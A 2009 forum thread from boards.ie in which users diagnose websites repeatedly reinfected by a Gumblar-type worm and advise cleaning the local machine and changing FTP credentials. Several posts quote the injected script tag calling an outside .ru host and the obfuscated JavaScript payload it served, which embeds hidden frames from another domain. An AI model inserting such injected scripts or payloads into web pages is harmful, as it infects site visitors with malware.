Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Sites being hacked

  • 05-11-2009 12:58pm
    #1
    Closed Accounts Posts: 10


    Hi there, Im a designer for several sites (all hosted by the same company), I keep getting message on google that the site has been hacked. I then have to go through process of cleaning files, re-uploading etc. Its soooo time consuming. Is anyone else experiencing this or is it just lack of security by my hosting company (when i asked them they said its not just them though)


Comments

  • Closed Accounts Posts: 1,089 ✭✭✭cpu-dude


    sunnyraink wrote: »
    Hi there, Im a designer for several sites (all hosted by the same company), I keep getting message on google that the site has been hacked. I then have to go through process of cleaning files, re-uploading etc. Its soooo time consuming. Is anyone else experiencing this or is it just lack of security by my hosting company (when i asked them they said its not just them though)
    Can we an example of one of this sites please? I know Google reports that it could be damaging to your computer but never hacked...


  • Closed Accounts Posts: 17,208 ✭✭✭✭aidan_walsh


    when i asked them they said its not just them though
    Its not either. Depending on how access was gained, it could well have been an exploit in user installed software, which is your reponsibility to keep up to date - as is ensuring that inputs are sanitised, folders are not accessible to the public, etc.


  • Registered Users, Registered Users 2 Posts: 2,793 ✭✭✭oeb


    sunnyraink wrote: »
    Hi there, Im a designer for several sites (all hosted by the same company), I keep getting message on google that the site has been hacked. I then have to go through process of cleaning files, re-uploading etc. Its soooo time consuming. Is anyone else experiencing this or is it just lack of security by my hosting company (when i asked them they said its not just them though)

    Have you tried up to date virus scans? Sounds like Gumblar or one of the related types.

    http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    These pages might help.

    http://wheelersoftware.com/articles/...n-kisswow.html

    or less likely

    http://blog.unmaskparasites.com/2009...om-cn-domains/

    (Includes cleanup instructions)

    Could be js, php or cgi being called.


    Also worth reading

    http://www.webologist.co.uk/2009/05/...to-remove.html


  • Registered Users, Registered Users 2 Posts: 912 ✭✭✭chakotha


    Does sound like a gumblar type.

    It might be your computer or a remote script that is re-infecting the websites. As far as I remember the worm compromises your FTP credentials then keeps re-infecting web pages even after you have cleaned them.

    I think you have to login to your hosting control panel from a "clean" computer and change the FTP login details.

    And then scan your own computer with malwarebytes removing the bad stuff before connecting again via the new FTP details.


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 7,740 ✭✭✭mneylon


    Sounds like Gumblar


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    </head>
    <script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
    <div class="wrapper">

    is this code shown above causing google to stop my website from being shown


  • Closed Accounts Posts: 18,163 ✭✭✭✭Liam Byrne


    B1977 wrote: »
    </head>
    <script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
    <div class="wrapper">

    is this code shown above causing google to stop my website from being shown

    I doubt anyone's gonna check that URL out, tbh.

    Bottom line is, if you didn't put that script there, it's malicious, and is probably the cause of the Google warning.


  • Registered Users, Registered Users 2 Posts: 2,793 ✭✭✭oeb


    B1977 wrote: »
    </head>
    <script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
    <div class="wrapper">

    is this code shown above causing google to stop my website from being shown


    Yes.

    Content of that URL is :
    // 404 <script>
    PDI=24;if(prompt)PDI='';tt3=unescape('%'+PDI);
    var uF3='documeY6eX74.wrX69te(x22G3cdivX20stX79leY3dY5cx22pox73itiX6fG6eG3aabG73oluY74ex3b leftG3aY2d1000pG78Y3b topx3aG2dX3100X30pG78Y3bX5cY22x3ex22)x3bdocY75x6dent.write(Y27X3cY65mbG65X64 widthX3d10X30 heigX68tY3d1X30Y30 sY72X63x3dX22httpG3aX2fG2faX72Y74iclX65s.Y6borajaX2eY63x6fx6dx2fshowcax74.phpX3fciG64Y3dY387X26Y63X6eX3dMY75sicx2bG25Y32Y36+MP3G3fsX3dpfX59SH6px4fx26idY3dx32x22 tX79pG65Y3dx22x61ppliY63atG69onY2fx70dY66Y22x3ex3cx2fembeG64x3eX27)G3bdocuY6dX65x6et.wX72itx65(Y27G3cG65mbeG64 widtY68X3d1G300 G68eightY3d1G300 srY63X3dx22httpX3aG2fX2farticleY73Y2ekoraY6aY61.comX2fshoX77cat.phpX3fcX69dX3d87G26cnX3dMusic+Y2526+MP3X3fX73Y3dX70x66X59SHY36G70OY26idx3d3Y22X3eY3cY2fembeY64Y3eG27)Y3bdY6fX63umX65nt.wG72itG65(Y22X3cY2fY64X69vx3eY22)Y3b';
    eval(unescape(uF3.replace(/[XGxY]/g,tt3)));
    
    //</script>
    

    That's defianatly grumblar. And yes, that's what's causing google to recognise your site as malware.

    (Just removing that wont fix your problem, because the infected machine will just modify the site again)


  • Registered Users, Registered Users 2 Posts: 410 ✭✭B1977


    where can i find that code in the website,every time i delete it a new one appears,is there a source somewhere else


  • Advertisement
  • Registered Users, Registered Users 2 Posts: 2,793 ✭✭✭oeb


    B1977 wrote: »
    where can i find that code in the website,every time i delete it a new one appears,is there a source somewhere else


    As has been mentioned in the thread
    Your computer is infected. It is modifying the site. Remove the virus from your machine first, or change the FTP passwords from a different, clean machine, and sanitize the site from there


Advertisement